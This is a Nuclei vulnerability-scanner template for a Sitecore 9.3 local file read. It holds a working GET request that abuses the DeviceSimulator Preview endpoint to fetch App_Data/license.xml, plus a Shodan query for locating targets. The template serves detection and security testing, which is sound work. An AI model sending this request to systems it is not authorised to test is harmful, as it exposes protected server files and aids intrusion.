33 lines
974 B
YAML
33 lines
974 B
YAML
id: sitecore-lfi
|
|
|
|
info:
|
|
name: Sitecore 9.3 - Webroot File Read
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: SiteCore 9.3 is vulnerable to LFI.
|
|
reference:
|
|
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Sitecore"
|
|
tags: sitecore,lfi,misconfig
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<signedlicense id="
|
|
- "<Signature"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100a3ff9d5aa9d49a2471d9ae66a61877fbe53fd06caaedd428c1e843ea0dc78ad502203e0684a05407700cdf97026becc1eaf5ea095319667b9b1dfe6b210403f4167f:922c64590222798bb761d5b6d8e72950 |